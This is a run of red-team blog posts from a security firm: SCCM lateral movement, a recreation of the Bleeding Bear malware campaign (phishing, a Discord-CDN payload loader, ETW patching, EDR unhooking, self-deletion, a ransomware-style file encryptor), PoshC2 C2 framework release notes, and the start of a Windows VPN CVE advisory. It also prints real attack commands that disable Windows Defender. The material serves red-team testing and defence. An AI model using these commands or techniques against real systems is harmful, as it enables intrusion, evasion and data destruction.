To get a list of deployments the following command could be used:

Get-WmiObject -Namespace "root\sms\site_<SiteCode>" -Query "Select AssignmentName,ApplicationName,CollectionName,Enabled FROM SMS_ApplicationAssignment"

Text Description automatically generated

Through all of these queries, it would be possible to return all attributes with SELECT * … instead of named attributes to then review where differences occur with the normal process surrounding SCCM.

PowerSCCM includes more cmdlets that may be useful for investigation purposes as well.

Conclusion

SCCM is a powerful tool for administrators and can be a useful tool as well for attackers. This blog post isn’t to suggest that there is a weakness within SCCM, only that deployments of SCCM frequently are permissive, with singular SCCM instances managing all the clients. This makes it an attractive target within engagements where server administrative privileges may be achieved but directions towards the target are unclear. The release of MalSCCM aims to shed some light on the risks of this attack path so that SCCM deployments are made with security in mind. Care should be taken when exploiting SCCM for lateral movement to ensure that only the targeted machines are compromised where authorisation has been provided to do so.

Download MalSCCM

github GitHub: https://github.com/nettitude/MalSCCM

The post Introducing MalSCCM appeared first on Nettitude Labs.

Repurposing Real TTPs for use on Red Team Engagements

7 April 2022 at 09:00

I recently read an interesting article by Elastic. It provides new analysis of a sophisticated, targeted campaign against several organizations. This has been labelled ‘Bleeding Bear’. The articles analysis of Bleeding Bear tactics, techniques and procedures left me with a couple of thoughts. The first was, “hey, I can probably perform some of these techniques!” and the second was, “how can I improve on them?”

With that in mind, I decided to create a proof of concept for elements of Operation Bleeding Bear TTPs. This is not an exact replica, or even an attempt to be an exact replica, because I found a lot of the actions the threat actors were performing were unnecessary for my objectives. I dub this altered set of techniques BreadBear.

Where there are changes, I’ll point them out along with the reasons for them. To help you to follow along with this blog post, I have posted the code to my GitHub repository, which you are welcome to download, examine, and run. This post will be separated into three distinct sections which will mark each stage of the campaign; initial payload delivery, payload execution, and finally document encryption.

Stage 1 – Initial Payload and Delivery

The first section of the Bleeding Bear campaign is described as a WhisperGate MBR wiper. Essentially, this technique will make any machine affected unbootable on the next boot operation. The attackers replace the contents of the MBR with a message that usually says something along the lines of “To get your data back, send crypto currency to xyz address”. I didn’t implement this because it’s a proof of concept and I didn’t want to wreck my development VM 100 times to test this out.

Instead, I created a stage 1 as a fake phishing scenario to be the initial delivery of the payload. The payload itself is delivered via a static webpage that upon loading will execute JavaScript to automatically download the stage 2 payload. However, it’s up to the end user to click past a few different warnings to run the executable. I’d like to mention that initial payload delivery is probably my weakest point in all of this, so if you’re reading this and can think of a million ways to improve upon this technique, please reach out to me on twitter or LinkedIn with recommendations.

The initial payload delivery is facilitated by a static web page with some JavaScript that has the user automatically download the targeted file upon loading of the page. The webpage itself is hosted by IPFS (Inter-Planetary File System). Once you have IPFS installed on your system, all you need to do is import your web-pages root folder to IPFS and retrieve the URL to your files. This process is very simple and looks as follows.

Once IPFS is installed, first hit Import, then Folder.

Graphical user interface, text, application, Teams Description automatically generated

Next, when the browser window opens, you’ll want to browse to your static webpages root folder. A sample provided by Black Hills Information Security is included in the GitHub repo under x64/release. With tools like zphisher you can create your own, more complex, phishing sites.

Once your folder has been imported, your files will be shared via the IPFS peer-to-peer network. Additionally, they will be reachable from a common gateway that you can set in your IPFS settings. IPFS has a list of gateways that can be used, located on this site. However, to retrieve the URL that can access your files you’ll want to right click on the folder, click share link, and then copy.

Graphical user interface, application, Word Description automatically generated

Graphical user interface, application Description automatically generated

Then, all you need to do is distribute this link with the proper context for your target. When the user clicks your link, they’ll be presented with the following page:

Graphical user interface, application, Word Description automatically generated

On Chrome, if they press keep, the file finishes the download and is ready for execution. The JavaScript code that performs the automatic download to force Chrome to ask to keep the file is shown below:

Text Description automatically generated

An element variable is initialized to the download href tag. Then, we set the element to our executable file named MicrosoftUpdater.exe. Finally, we click the element programmatically which starts the download process. For more information about how IPFS can be used as a malware hosting service, read this blog by Steve Borosh who was the inspiration of the initial payload delivery.

Stage 2 – Payload Execution

Once the user has been successfully phished, phase 1 has been completed and we transition into phase 2, with the execution of stage2.exe or, in this case, the MicrosoftUpdater.exe program. In the Bleeding Bear campaign, the heavy lifting is performed by the stage2.exe binary, which uses Discord to download and execute malicious programs. My stage 2 binary also utilizes the Discord CDN to download, reflectively load, and execute stage 3. However, that’s pretty much where the comparison stops.

The stage 2 Discord downloader in the Bleeding Bear campaign downloads an obfuscated .NET assembly and uses reflection to load it. However, mine is a compiled PE binary. Additionally, the Bleeding Bear campaign performs a lot of operations which require either a UAC bypass or a UAC accept from the user to perform. These actions include writing a VBScript payload to disk which will set a Defender exclusion path on the C drive.
"C:\Windows\System32\WScript.exe""C:\Users\jim\AppData\Local\Temp\Nmddfrqqrbyjeygggda.vbs"
powershell.exe Set-MpPreference -ExclusionPath 'C:\'

Then the payload will download and run AdvancedRun in a higher integrity to stop Windows Defender and delete all files in the Windows Defender directory.

"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" `
/WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" `
/EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 `
/CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" `
/StartDirectory "" /RunAs 8 /Run

Next, InstallUtil.exe is downloaded to the user’s Temp directory. The InstallUtil program is used for process hollowing. This means that the executable is started in a suspended state, then the memory of the process is overwritten with a malicious payload which is then executed instead. To the computer, it will look like InstallUtil is running, however, it is actually the payload. In the Bleeding Bear campaign, that malicious payload happens to be a File Corruptor, which overwrites 1MB of the byte 0xCC over all files that end with the following extensions:

.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD .BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF .DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO .GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX .KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP .ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3 .PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX .PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK .SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM .SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD .VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM .XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP

I found a lot of these steps to be unnecessary; therefore, I did not perform them. I wanted to leave as minimal trace on the system as possible. I also didn’t see a need for a high integrity process to be spawned to perform ancillary functions, such as deleting Windows Defender, when we can just bypass it. However, my stage 2 code does contain a failed UAC bypass even though it is not used.

The differences between my stage 2/3 will become apparent as we walk through the code. Before we start walking through the code, I’d like to mention the features of my stage 2 so that when you see auxiliary function names through the code – it’ll make sense. My stage 2 does the following:

  • Dynamically retrieves function pointers to any Windows APIs used maliciously
    • Has a custom GetProcAddress() & GetModuleHandle() implementation to retrieve function calls
    • Custom LoadLibrary() function that will dynamically retrieve the pointer to LoadLibraryW() at each run.
  • Hides the console window at startup.
  • Has a self-delete function which will delete the file on disk at runtime once the PE has been loaded into memory and executed.
  • Unhooks DLLs using the system calls for native windows APIs (using the Halo’s Gate technique).
  • Disables Event Tracing for Windows (ETW).
  • Uses a simple XOR decrypt function to decrypt strings such as Discord CDN URLs at runtime.
  • Performs a web request to Discord CDN using Windows APIs to retrieve stage3 in a base64 encoded format.
  • Reflectively loads a stage 3 payload in memory and executes.
  • Lazy attempts at string obfuscation.

With that said, I will only cover techniques I found particularly interesting or important in this blog post for brevity.

A picture containing text Description automatically generated

First, we see a dynamically resolved ShowWindow() used to hide the window. Next, we see SelfDelete() which will delete itself from disk even if the executable is running still. I believe this function is a neat trick and worth going over.

A picture containing text Description automatically generated

First, we dynamically resolve pointers to the Windows APIs CloseHandle(), SetFileInformationByHandle(), CreateFileW(), and GetModuleFileNameW(). Following that we create some variables to store necessary information.

Text Description automatically generated

Next, we resolve the path that our stage 2 is downloaded to disk using GetModuleFileNameW(). We then obtain a handle to stage 2 using CreateFileW() and the OPEN_EXISTING flag. We create a FILE_RENAME_INFO structure and populate its contents with the rename string “:breadman” and a flag to replace the file if it exists already. We make a call to setFileInformationByHandle() using our file handle, our rename information structure, and the FileRenameInfo() flag. This renaming of the file handle will allow us to delete the file on disk. This is because the file lock occurs on the renamed file handle. We can then reopen a file handle to the original file on disk and delete it. Thus, we close our handle and reopen it using the original filename path. After, we call SetFileInformationByHandle() again with a File Disposition Info structure and the DeleteFileW() flag set to true. Finally, we close our file handle, which will cause the file to be deleted from disk and we continue our code execution back in main.

With that done, we perform the unhooking of our DLLs using System Calls and Native APIs to bypass AV/EDR hooking. I won’t cover this in depth, however, the same exact code is used in another of my blog posts.

The next important functions in main() are disabling event tracing for windows and decrypting the encrypted Discord CDN strings.

Text Description automatically generated

The disabling of event tracing for windows is simple (function template credits to Sektor7 institute):

Text Description automatically generated

First, we obtain a handle to the function EventWrite() in the NTDLL.dll library. Then we change the memory protections of a single page to execute+read+write, copy in the byte equivalent to xor rax,rax ; ret at the first four bytes. This will eventually set the return value of the function to zero (probably indicating success) and then returning. The function essentially returns without performing any actions, and therefore disables event tracing for windows.

I won’t go over the XOR decryption since it’s a rudimentary technique. However, I will go over how you can use Discord CDN as a MDN ‘Malware Distribution Network’.

In Discord, anyone can create their own private server to upload files, messages, pictures, etc. to. However, access to anything uploaded, even to a private server, does not require authentication. One caveat to keep in mind, however, is that executables need to be converted to a base64 string. When I downloaded them manually from the CDN, I ran into problems (likely compression) where the size was smaller when I downloaded it using APIs. The same problem did not occur with text files. Therefore, I put the base64 encoded PE file into a text file and downloaded that instead. This looks like the following:

Graphical user interface, text, application Description automatically generated

Once you’ve uploaded the file, you can right click the download link at the bottom of the above screenshot, then select Copy Link.

Graphical user interface, text, application, website Description automatically generated

Once that has been completed, you have your Discord CDN URL that is accessible from anywhere in the world without authentication. Additionally, these URLs are valid forever even if the file has been deleted from the server.

It’s as simple as that. Obviously, there might be some red team infrastructure you’d want to standup in-between the CDN and the target host to redirect any potential security analysts who go snooping, but it’s an effective method for serving up malware.

Next, to finish up main(), we perform the following tasks. We first parse our Discord CDN URL that was just decrypted into separate parts. Then we perform a request to download our targeted file by calling the do_request() function using the parsed URL pieces.

Text Description automatically generated

We open the do_request() function by dynamically resolving pointers to any Windows APIs we will use to perform the HTTPS request to Discord. We then follow that up by initializing variables we’re going to use as parameters to the following WinInet function calls.

Graphical user interface, text Description automatically generated

There aren’t too many interesting pieces of information regarding our Internet API calls, aside from the InternetOpenA() and the HttpOpenRequestA() calls. For the first, we specify INTERNET_OPEN_TYPE_DIRECT to ensure that there is no proxy. We can put default options here to specify the default system proxy settings. Additionally, for HttpOpenRequestA() we specify the INTERNET_FLAG_NO_CACHE_WRITE flag to ensure the call doesn’t cache the file download in the %LocalAppData%\Microsoft\Windows\INetCache. Next, we make a call to HttpQueryInfoA() with the HTTP_QUERY_CUSTOM flag. This ensures that we can receive the value of a custom HTTP Response header that we got back when we made our HTTP request. The specified custom query header is passed to do_request() from main and is the content length header. We will use this value to allocate memory for our stage 3 payload that was just downloaded.

Text Description automatically generated

We now allocate memory for our downloaded file using malloc() and the size of our content length value. Following that, we make a call to InternetReadFile() function to load the base64 encoded data into our allocated memory space. Once it has been successfully loaded, we make a call to pCryptStringToBinaryW(), which will convert our base64 encoded data into the byte code that makes up our stage 3 payload. We then free the allocated memory region and call the final function of do_request() which is reflectiveLoader().

Text Description automatically generated

I won’t go over the reflective loading / execution of our PE File in memory because I’ve written a previous blog post about it already. However, I used the code from this resource as the base of my loader.

Stage 3 – File Corruptor

Stage 3 probably has the biggest differences in functionality from the Bleeding Bear campaign. The stage 3 of the Bleeding Bear campaign is a “File Corruptor”, and not an encryption scheme. What this means is that the Bleeding Bear campaign’s third stage will overwrite the first 1mb of data of all files it finds on disk that are not critical to system operation. If the file is smaller than 1mb of data, it will overwrite the whole file and add the difference to make a 1mb file. As far as I know, the campaign does not download the unaffected files before overwriting, therefore all data will be lost. This file corruptor is also not a reflectively loaded PE file. Instead, the file corruptor is likely a piece of shellcode that is executed via a process hollowing technique. The stage 2 of the Bleeding Bear campaign downloads InstallUtil.exe to disk, executes it in a suspended state, overwrites the process memory to the corruptor shellcode, and then resumes the process execution.

The BreadBear technique uses a file encryptor rather than a corruptor. I decided to use an encryptor because eventually I plan to add the functionality of downloading the unencrypted data, the keys used to encrypt the file, and to add a decryption function. I believe this would be beneficial to clients who want to test against a simulated ransomware campaign. Additionally, since I am reflectively loading the stage 3 executable in memory, there’s no need to perform process hollowing, or even writing the InstallUtil binary to disk. I believe my approach is more operationally secure than the Bleeding Bear’s alternative.

Additionally, with my approach you can swap out your stage 3 from file encryptor to implant shellcode. I have successfully tested my stage 3 payload with the binary from my previous blog post BreadMan Module Stomping. The only requirement for the reflective loading is that the file chosen is compiled in a valid PE format.

With that being said, let’s dive into stage 3: the file encryptor.

I would like to note that no attempts at obfuscation or evasion were made in the stage 3 payload. This is because it is being loaded into a process memory space that was unhooked from AV/EDR, and ETW patching have already occurred, so it is not needed.

Text Description automatically generated

In main(), all we do is call the encryptDirectory() function with the argument of our target directory. Note, that since this is a proof of concept, I did not implement functionality to encrypt entire drives.

encryptDirectory() starts by initializing a variable to hold a new directory path called tmpDirectory(). We add the portion “\\*” to our target directory which will indicate we want to retrieve all files. Then, we initialize a WIN32_FIND_DATAW and a file handle variable.

Text Description automatically generated

Next, we call FindFirstFileW() using the target directory and our FIND_DATAW variables as parameters. Then, we create a linked list of directories.

To follow that up, we enter a do-while loop, which continues while we have more directories or files to encrypt in our current directory. We initialize two more file directory path variables. The tmp2 variable stores the name of the next file/directory we need to traverse/encrypt, and the tmp3 variable stores the randomized encrypted file name after the file has been encrypted. Next, we check if the object we obtained a handle to is a directory and if it is the current or previous directory, ‘.’, or ‘..’. If it is, we skip them.

If it’s any other directory, we append the name of that directory to the current directory, add it as a node to our linked list, and continue. If it’s a file, we generate a random string, append that string to the current directory path, and call encryptFile(). This function takes the following parameters: the full path to the unencrypted file, the full path name of the encrypted file, and the password used to encrypt. We then call DeleteFile() on the unencrypted file. Finally, we obtain a handle to the next file in the folder.

Text Description automatically generated

To finish the function off, we recursively call encryptDirectory() until there are no more folders in the linked list of folders we identified.

Text Description automatically generated

I won’t dive too deep into the file encryption function for two reasons. First, I am not a big cryptography guy. I don’t know much about it, and I don’t want to give any false information. Second, I took this proof of concept and just implemented it in C instead of CPP.

However, the important part I’d like to highlight is that I used the same determination scheme the Bleeding Bear campaign uses to ascertain if a file should be corrupted or not. BreadBear and Bleeding Bear both use the following file extension list to determine if a file should be altered:

Text Description automatically generated

Conclusion

With BreadBear, I took an analysis of a real threat actors TTPs and created a working proof of concept, which I believe improves upon some of their tooling. This work can help organizations visualize how a campaign can be easily created and defend accordingly. More importantly, it was an educational exercise. Feel free to contribute to the code base over on GitHub.

The post Repurposing Real TTPs for use on Red Team Engagements appeared first on Nettitude Labs.

Introducing PoshC2 v8.0

We’re thrilled to announce a new release of PoshC2 packed full of new features, modules, major improvements, and bug fixes. This includes the introduction of a brand-new native Linux implant and the capability to execute Beacon Object Files (BOF) directly from PoshC2!

Download and Documentation

Please use the following links for download and documentation:

RunOF Capability

In this release, we have introduced Joel Snape’s (@jdsnape) excellent method to run Cobalt Strike Beacon Object Files (BOF) in .NET, and its integration in PoshC2. This feature has a blog post unto itself available, but essentially it allows existing BOFs to be run in any C# implant, including PoshC2.

Text Description automatically generated

At a high-level, here is how it works:

  • Receive or open a BOF file to run
  • Load it into memory
  • Resolve any relocations that are present
  • Set memory permissions correctly
  • Locate the entry point for the BOF
  • Execute in a new thread
  • Retrieve any data output by the BOF
  • Clean-up memory artifacts before exiting

Read our recent blog post on this for more detail.

SharpSocks Improvements

SharpSocks provides HTTP tunnelled SOCKS proxying capability to PoshC2 and has been rewritten and modernised to improve stability and usability, in addition to having its integration with PoshC2 improved, so that it can be more clearly and easily configured and used.

Text Description automatically generated

RunPE Integration

Last year, Rob Bone (@m0rv4i) and Ben Turner (@benpturner) released a whitepaper on “Process Hiving” along with a new tool “RunPE”, the source code of which can be found here. We have integrated this technique within this release of PoshC2 for ease of use, and it can be executed as follows:

Text Description automatically generated

By default, new executables can be added to /opt/PoshC2/resources/modules/PEs so that PoshC2 knows where to find them when using the runpe and runpe-debug commands shown above.

DllSearcher

We’ve added the dllsearcher command which allows operators to search for specific module names loaded within the implant’s current process, for instance:

Graphical user interface, application Description automatically generated

GetDllBaseAddress, FreeMemory & RemoveDllBaseAddress

Three evasion related commands were added which can be used to hide the presence of malicious shellcode in memory. getdllbaseaddress is used to retrieve the implant shellcode’s current base address, for example:

Graphical user interface, text, application, chat or text message Description automatically generated

Looking at our process in Process Hacker, we can correlate this base address memory location:

Table Description automatically generated

By using the freememory command, we can then clear this address’ memory space:

Graphical user interface, application Description automatically generated

Table Description automatically generated

The removedllbaseaddress command is a combination of getdllbaseaddress and freememory, which can be used to expedite the above process by automatically finding and freeing the relevant implant shellcode’s memory space:

Graphical user interface, text, application Description automatically generated

Get-APICall & DisableEnvironmentExit

In this commit we implemented a means for operators to retrieve the memory location of specific function calls via get-apicall, for instance:

Graphical user interface, application Description automatically generated

In addition, we’ve included disableenvironmentexit which patches and prevents calls to Environment.Exit() within the current implant. This can be particularly useful when executing modules containing this call which may inadvertently kill our implant’s process.

C# Ping, IPConfig, and NSLookup Modules

Several new C# modules related to network operations were developed and added to this release, thanks to Leo Stavliotis (@lstavliotis). They can be run using the following new commands:

  • ping <ip/hostname >
  • nslookup <ip/hostname>
  • ipconfig

C# Telnet Client

A simple Telnet client module has been developed by Charley Celice (@kibercthulhu) and embedded in the C# implant handler to provide operators the ability to quickly validate Telnet access where needed. It will simply attempt to connect and run an optional command before exiting:

A picture containing graphical user interface Description automatically generated

We have plans to add additional modules such as this one to cover a wider range of services.

C# Registry Module

Another module by Charley Celice (@kibercthulhu) was added. SharpReg allows for common registry operations in Windows. At this stage it currently consists of simple functionalities to search, query, create/edit, delete and audit registry hives, keys, values and data. It can be executed as shown below:

Text Description automatically generated

We’re adding more features to this module which will include expediating certain registry-based persistence, privilege escalation, UAC bypass techniques, and beyond.

PoshGrep

PoshGrep can easily be used to parse task outputs. This can be particularly useful when searching for specific process information obtained from a large number of remote hosts. It can be used by piping your PoshC2 command into poshgrep, for example:

A screenshot of a computer Description automatically generated with medium confidence

The output task database retains the full output for tracking.

FindFile

findfile was added, which can be used to search for specific file names and types. In the example below, we search for any occurrences of the file name “password” within .txt files:

Graphical user interface Description automatically generated with medium confidence

Bringing PoshC2 to Linux

One of the major new features we have incorporated in this release of PoshC2 is our new Native Linux implant, thanks to the great work of Joel Snape (@jdsnape). While it’s fair to say that we spend most of our time on Windows, we find that having the capability to persist on Linux machines (usually servers) can be key to a successful engagement. We also know that many of the adversaries we simulate have developed tooling specifically for Linux. PoshC2 has always had a Python implant which will run on Linux assuming that Python is installed, but we decided that it was time that we advanced our capabilities to a native binary that is harder to detect and has fewer dependencies.

To that end, Posh v8.0 includes a native Linux implant that can run on any* x86/x64 Linux OS with a kernel >= 2.6 (it should work on earlier versions, but we’ve not tested that far back!). It also works on a few systems that aren’t Linux but have implemented enough of the syscall interface (most importantly ESXi hypervisors).

Usage

When payloads are created in PoshC2 you will notice a new “native_linux” payload being written on startup:

Payload

Payload

This is the stage one payload, and when executed will contact the C2 server and retrieve the second stage. The first stage is a statically linked stripped executable, around 1MB in size. The second stage is a statically linked shared library, that the first stage will load in memory using a custom ELF loader and execute (see below for more detail). The dropper has been designed to be as compatible as possible, and so should just work out of the box regardless of what userspace is present.

The aim of the implant is not to be “super-stealthy”, but to emulate a common Linux userspace Trojan. Therefore, the implant just needs to be executed directly; how you do this will obviously depend on the level of access you have to your target.

Once the second stage has been downloaded and executed the implant operates in much the same way as the existing Python implant, supporting many of the same commands, and they can be listed with the help command:

help

Help

Most notably, the implant allows you to execute other commands as child processes using /bin/sh, run Python modules (again, assuming a Python interpreter is present on your target), and run the linuxprivchecker script that is present in the Python implant.

Goal

To meet our needs, we set the following high-level goals:

  • Follow the existing pattern of a small stage one loader, with a second stage being downloaded from the C2 server.
  • A native executable, with as few dependencies as possible and that would run on as many different distributions as possible.
  • Compatibility with older distributions, particularly those with an older kernel.
  • As little written to disk as possible beyond the initial loader.
  • Run in user-space (i.e., not a kernel implant).

This gives us greater flexibility and stealth, and allows us to operate on machines that maybe don’t have Python installed or where a running Python process would be anomalous.

There are a few choices in language and architecture to build native executables. The “traditional” method is to use C or C++ which compiles to an ELF executable. More modern languages, like Golang, are also an option, and have notably been used by some threat groups to develop native tooling. For this project however we decided to stick with C as it lets us implement small and lean executables.

How it Works

The Linux implant comes in two parts, a dropper and a stage two which is downloaded from the C2.

Compilation of the native images can be a bit time consuming, so we have provided binary images in the PoshC2 distribution (you can see the source code here). This means that when a new implant is generated, PoshC2 needs a way to “inject” its configuration into the binary file. All configuration is contained in the dropper, except for a random key and URI which are patched over placeholder values in the stage two binary and is contained in an additional ELF section at the end of the binary. This is injected by PoshC2 using objcopy when a new implant is generated. You should note that at the moment there is no obfuscation or encryption of the configuration so it will be trivially readable with strings or similar.

When the dropper is launched it parses the configuration and connects to the C2 server to obtain the second stage using the configured hosts and URLs.

Loading the Second Stage

Our main aim with the execution of the second stage was to be able to run it without writing any artifacts to disk, and to have something that was easy to develop and compile. Given the above goals, it also needed to be as portable as possible.

The easiest way to do this would be to create a shared library and use the dlopen() and dlsym() functions to load it and find the address of a function to call. Historically, the dlopen() functions required a file to operate on, but as of kernel version 3.17 it is possible to use memfd_create to get a file descriptor for memory without requiring a writable mount point. However, there are two issues with that approach:

  • The musl standard library we are using (see below) doesn’t support dlopen as it doesn’t make sense in a context where everything is statically linked.
  • Ideally, we’d like to support kernels older than 3.17, as although it was released in 2014, we still come across older ones from time to time.

Given these constraints, we implemented our own shared library loader in the dropper. More details can be found in the project readme, but at a high level it’s this:

  • Parses the stage two ELF header, and allocates memory as appropriate.
  • Copies segments into memory as required.
  • Carries out any relocations required (as specified in the relocations section).
  • Finds the address of our library’s entry function (we define this as loopy() because it, well, loops…).
  • Calls the library function with a pointer to a configuration object and a table of function pointers to common functions the second stage needs.

If you want to understand this process in more detail there is an excellent set of articles by Eli Bendersky that go through the process for load time relocation and position independent code.

In theory, the second stage could be any statically linked library, but we’ve not extensively tested the loader. In the future, we’d like to re-use this loader capability to allow additional modules to be delivered to the implant so you can bring your own tooling as needed (for example, network scanning or proxying).

At this point the second stage is now operating and can communicate with the C2, run commands, etc.

Compatibility

One of the key aims for the Linux implant was to make it operate on as many different distributions/versions as possible without needing to have any prior knowledge of what was running before deployment – something that can be difficult to achieve with a single binary.

Normally Linux binaries are “dynamically linked”, which means that when the program is run the OS runtime-linker (usually something like /lib/ld-linux-x86-64.so.2) finds and loads the shared libraries that are needed.

For example, running ldd /bin/ssh, which shows the linked library dependencies, demonstrates that it depends on a range of different system libraries to do things like cryptographic operations, DNS resolutions, manage threads, etc. This is convenient because your binaries end up being smaller as code is reused, however it also means that your program will not run unless that the specific version of the library you linked against at compile time is present on the target system.

Obviously, we can’t always guarantee what will be present on the systems we are deploying on, so to work around this the implant is “statically linked”. This means that the executable contains its code and all of the libraries that it needs to operate in one file and has no dependencies on anything other than the operating system kernel.

The key component that needs to be linked is the “standard library” which is the set of functions that are used to carry out common tasks like string/memory manipulation, and most importantly interface between your application and the OS kernel using the system call API. The most common standard library is the GNU C library (glibc), and this is what you will usually find on most Linux distributions. However, it is fairly large and can be difficult to successfully statically link. For this reason, we decided to use the musl library, which is designed to be simple, efficient and used to produce statically linked executables (for example as on Alpine Linux).

Because the implant comes in two parts, if there are any common dependencies (e.g., we use libcurl to make HTTPS requests) then they would normally have to be statically linked into each binary. This would obviously be inefficient as the process would end up having two copies of the library in memory, one from the dropper and one from the stage two, and the stage two would be unnecessarily large. Therefore, for the larger libraries like libcurl a set of function pointers are provided from the dropper when it executes the stage two, so it can take advantage of the libraries that were already linked into the dropper.

The implant is built for x86 systems, as this means that it will run on both 32- and 64-bit operating systems. Other architectures (e.g., ARM) may follow.

Child Processes

Our implant would be pretty limited without the ability to execute other commands using the system shell. This is easily carried out using the popen() function call in the standard library which executes the given command and opens a pipe so the command’s output can be read. However, some commands (e.g. ping with default arguments) may not exit, and so our implant would “hang” reading the output forever. To get around this, we have written a custom popen() implementation that allows us to launch our subcommand in a custom process group and set an alarm using SIGALRM to kill it after a user-configurable timeout period. Any output written by the process is then read and returned to the C2. This does mean however that long running commands will be prematurely terminated.

Detection

We typically find that Linux environments have a lot less scrutiny applied than their Windows counterparts. Nevertheless, they are often hosting critical services and data and so monitoring for suspicious or unusual behaviour should be considered. Many security vendors are starting to release monitoring agents for Linux, and several open-source tools are available.

A full exploration of security monitoring for Linux is out of scope for this post, but some things that might be seen when using this implant are:

  • Anomalous logins (for example SSH access at unusual times, or from an unusual location).
  • Vulnerability exploitation (for example, alerts in NIDS).
  • wget or curl being used to download files for execution.
  • Program execution from an unusual location (e.g. from a temporary directory or user’s home directory).
  • Changes to user or system cron entries.

The dropper itself has very limited operational security so we expect static detection of the binary by antivirus or NIDS to be relatively straightforward in this publicly released version.

It’s also worth reviewing the PoshC2 indicators of compromise listed at https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise.

Full Changelog

Many other updates and fixes have been added in this version and merged to dev, some of which are briefly summarized below. For updates and tips check out @nettitude_labs, @benpturner, @m0rv4i and @b4ggio-su on Twitter.

  • Miscellaneous fixes and refactoring
  • Fixed MSTHA and RegSvr32 quickstart payloads
  • Several runas and Daisy.dll related fixes
  • Improved PoshC2 reports output and style
  • Enforced the consistent use of UTC throughout
  • FComm related fixes
  • Added Native Linux implant and related functionalities from Joel Snape (@jdsnape)
  • Added Get-APICall & DisableEnvironmentExit in Core
  • Updated to psycopg2-binary so it’s not compiled from source
  • Database related fixes
  • RunPE integration
  • Added GetDllBaseAddress, FreeMemory, and RemoveDllBaseAddress in Core
  • Added C# Ping module from Leo Stavliotis (@lstavliotis)
  • Fixed fpc script on PostgreSQL
  • Added PrivescCheck.ps1 module
  • Added C# IPConfig module from Leo Stavliotis (@lstavliotis)
  • Updated several external modules, including Seatbelt, StandIn, Mimikatz
  • Added EventLogSearcher & Ldap-Searcher
  • Added C# NSLookup module from Leo Stavliotis (@lstavliotis)
  • Added getprocess in Core
  • Added findfile, getinstallerinfo, regread, lsreg, and curl in Core
  • Added GetGPPPassword & GetGPPGroups modules
  • Added Get-IdleTime to Core
  • Added PoshGrep option for commands
  • Added SharpChromium
  • Added DllSearcher to Core
  • Updated Dynamic-Code for PBind
  • Added RunOF capability into Posh along with several compiled situational awareness OFs
  • Updated Daisy Comms
  • Added C# SQLQuery module from Leo Stavliotis (@lstavliotis)
  • Added ATPMiniDump
  • Added rmdir, mkdir, zip, unzip & ntdsutil to Core
  • Fix failover retries for C# & Updated SharpDPAPI
  • Updated domain check case sensitivity in dropper
  • Fixed dropper rotation break
  • Added WMIExec and SMBExec modules
  • Added dcsync alias for Mimikatz
  • Added AES256 hash for uploaded files
  • Added RegSave module
  • SharpShadowCopy integration
  • Fixed and updated cookie decrypter script
  • Updated OPSEC Upload
  • Added FileGrep module
  • Added NetShareEnum to Core
  • Added StickyNotesExtract
  • Added SharpShares module
  • Added SharpPrintNightmare module
  • Added in memory SharpHound option
  • Updated Tasks.py to save Seatbelt output
  • Added kill-remote-process to Core
  • Fixed jxa_handler not being imported
  • Updated posh-update script to accept -x to skip install
  • Added process name in implant view from Lefteris Panos (@Lefterispan)
  • Added SharpReg module from Charley Celice (@kibercthulhu)
  • Added SharpTelnet module from Charley Celice (@kibercthulhu)
  • kill-process with no arguments now terminates the implant’s current process following a warning prompt
  • Added hide-dead-implants command
  • Added ability to modify user agent when creating new payloads from Kirk Hayes (@l0gan54k)
  • Added get-acl command in Core

Download now

github GitHub: https://github.com/nettitude/PoshC2

The post Introducing PoshC2 v8.0 appeared first on Nettitude Labs.

CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference

22 March 2022 at 09:00

CVE-2022-23253 is a Windows VPN (remote access service) denial of service vulnerability that Nettitude discovered while fuzzing the Windows Server Point-to-Point Tunnelling Protocol (PPTP) driver. The implications of this vulnerability are that it could be used to launch a persistent Denial of Service attack against a target server. The vulnerability requires no authentication to exploit and affects all default configurations of Windows Server VPN.

Nettitude has followed a coordinated disclosure process and reported the vulnerability to Microsoft. As a result the latest versions of MS Windows are now patched and no longer vulnerable to the issue.

Affected Versions of Microsoft Windows Server

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected windows versions check the official disclosure post on MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23253.

Overview

